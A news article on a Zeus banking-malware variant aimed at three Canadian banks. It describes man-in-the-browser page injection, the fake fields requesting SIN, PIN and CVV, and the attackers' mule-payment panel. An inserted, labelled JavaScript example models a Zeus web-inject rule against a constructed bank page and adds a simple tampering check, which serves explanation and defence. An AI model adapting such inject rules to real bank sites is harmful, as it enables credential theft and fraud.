American financial institutions have been the targets of a number of malware attacks in the past 12 months. Now hackers are turning their eyes on Canadian banks.
Security vendor SentinelOne said this week it has found a new variant of the Zeus online banking malware aimed at the Bank of Montreal (BMO), Royal Bank of Canada (RBC) and National Bank of Canada.
This variant of Zeus behaves like other banking malware that transparently replaces the bank's real login page with a fake one, SentinelOne's Anton Zukin said in a blog post. A victim has no reason to believe they are not on the bank's real website, he wrote.
This variant, like most banking Trojans, is not detected by anti-virus products, he added. It also sidesteps the browser's SSL/TLS protections. Because the malware runs on the endpoint device itself, it injects its fake content into the browser after the page has been decrypted (a man-in-the-browser attack), so the SSL connection to the bank's real server is never broken and the browser raises no certificate warning.
Customers in the habit of glancing at the address bar will see that the fake page still shows the bank's real HTTPS address, since the browser really is connected to the bank, which can give a false sense of security.
But careful customers would notice major changes to the login page that should tip them off: the fake screen asks for the customer's social insurance number, date of birth, driver's licence number, ATM PIN and mother's maiden name. While it asks for a credit card number for identification, as the real login page does, it also asks for the card's expiry date and verification number (CVV), which the real page doesn't.
The fake site justifies asking for the additional information with a statement that “In accordance with new protection regulations we have now added an additional layer of security for our customers.”
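The mechanism described above, as an added example that is not code from the article or from SentinelOne's write-up: a Zeus-style web-inject rule is applied to a bank login page inside the browser, after the page has been decrypted, which is why the address bar and certificate are untouched. The rule syntax (set_url, data_before, data_inject, data_after, data_end) is the one Zeus web-inject configs use; the bank page, URL, field names and rule body are constructed for this example and belong to no real bank. The last function automates the check the article tells customers to make, flagging any input field the real login form never asks for.

```javascript
// Added example, not code from the article or from SentinelOne's write-up.
// Models a Zeus-style web inject rewriting a bank login page inside the
// browser, after TLS decryption, and a simple check for the tampering.
// The bank page, URL, field names and rule body are constructed for this
// example; the rule syntax is the one Zeus web-inject configs use.

// Constructed: the login page as the browser received it from the bank.
const ORIGINAL_PAGE = `<html><body>
<form id="login" action="/signin" method="post">
  <input name="cardnumber" type="text">
  <input name="password" type="password">
  <input type="submit" value="Sign in">
</form>
</body></html>`;

// Constructed: one web-inject rule. The injected block adds the extra
// fields the article lists and the bogus "new protection regulations" text.
const INJECT_RULE = `set_url https://www.example-bank.test/signin* GP
data_before
<input name="password" type="password">
data_end
data_inject
<p>In accordance with new protection regulations we have now added an additional layer of security for our customers.</p>
<input name="sin" type="text">
<input name="dob" type="text">
<input name="dl_number" type="text">
<input name="atm_pin" type="password">
<input name="mmn" type="text">
<input name="card_expiry" type="text">
<input name="card_cvv" type="text">
data_end
data_after
data_end`;

const SECTION_FOR = { data_before: 'before', data_inject: 'inject', data_after: 'after' };

// Parse a single rule into { url, before, inject, after }.
function parseInjectRule(text) {
  const rule = { url: null, before: '', inject: '', after: '' };
  let section = null;
  for (const line of text.split('\n')) {
    if (line.startsWith('set_url ')) {
      rule.url = line.split(/\s+/)[1]; // trailing "GP" flags: apply to GET and POST
    } else if (line === 'data_end') {
      section = null;
    } else if (Object.prototype.hasOwnProperty.call(SECTION_FOR, line)) {
      section = SECTION_FOR[line];
    } else if (section !== null) {
      rule[section] += (rule[section] ? '\n' : '') + line;
    }
  }
  return rule;
}

// set_url patterns are globs where '*' matches any run of characters.
function urlMatches(pattern, url) {
  const escaped = pattern.split('*')
    .map(s => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'))
    .join('.*');
  return new RegExp('^' + escaped + '$').test(url);
}

// Apply the rule to the decrypted page body: insert data_inject right after
// the first occurrence of data_before (and, when data_after is non-empty, only
// if data_after follows it). Returns the page unchanged if the rule does not apply.
function applyInject(rule, url, html) {
  if (!urlMatches(rule.url, url)) return html;
  const start = html.indexOf(rule.before);
  if (start < 0) return html;
  const insertAt = start + rule.before.length;
  if (rule.after && html.indexOf(rule.after, insertAt) < 0) return html;
  return html.slice(0, insertAt) + '\n' + rule.inject + html.slice(insertAt);
}

// Names of every <input> in the page (lower-cased), in document order.
function inputNames(html) {
  const names = [];
  const re = /<input\b[^>]*\bname=["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Constructed allow list: what the bank's real login form asks for.
const EXPECTED_LOGIN_FIELDS = new Set(['cardnumber', 'password']);

// Any input field the real login form never asks for is a sign of tampering.
function unexpectedFields(html) {
  return inputNames(html).filter(name => !EXPECTED_LOGIN_FIELDS.has(name));
}

// Stand-alone run: the real page passes, the injected page is flagged.
const demoRule = parseInjectRule(INJECT_RULE);
const demoTampered = applyInject(demoRule, 'https://www.example-bank.test/signin?lang=en', ORIGINAL_PAGE);
console.log('clean page:', unexpectedFields(ORIGINAL_PAGE));
console.log('injected page:', unexpectedFields(demoTampered));
```

The detection side is deliberately crude: a real bank's page would be checked against its own known field list, and a more robust integrity check would compare the form the user sees with what the server actually sent (for instance, via a signed form manifest), but the example already shows why the address bar cannot be trusted here and what a customer, or a client-side check, can look for instead.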
Asked for a comment, an RBC spokesperson issued the following statement: “Safeguarding our network and the confidentiality of our clients is always a top priority. Our internal Information Security team is aware of the new version of Zeus and is actively monitoring our network to help make sure RBC is protected and our clients have access to our services. As always, we also advise our clients to maintain the security of their systems and adhere to best practices such as changing their passwords and reviewing their transactions.”
Security pros might be interested in the sophistication of the malware. SentinelOne has accessed its control panel, which shows it includes a form to configure and customize each attack, including the destination bank account for the stolen funds, drop name, city, country, IBAN account number and a memo about the transaction. The system can automatically calculate the percentage of the stolen money that the person receiving it (the "mule") keeps before transferring the balance to the attacker. The attackers can also specify minimum and maximum balances for targeted accounts and minimum and maximum transfer amounts.
Details on each bank account that was attacked, including login IDs, browser data, whether the login was successful and balance information, are also collected.
“This attack continues a growing trend in banking malware that goes beyond simply targeting the victim’s login credentials (i.e. their username and password) and injects pages to steal a wealth of personal information including answers to security questions, debit and credit card numbers, social security number, driver license number and more,” Zukin wrote. “While some of this information can be used to commit online banking fraud, the other personal data can be used for different crimes including healthcare fraud, opening credit accounts in victims’ names, etc. It could even be used in spear phishing attacks to target individuals within enterprises and government agencies in order to breach secure networks.
“It also demonstrates how attackers can now easily repurpose malicious code to target several brands simultaneously.”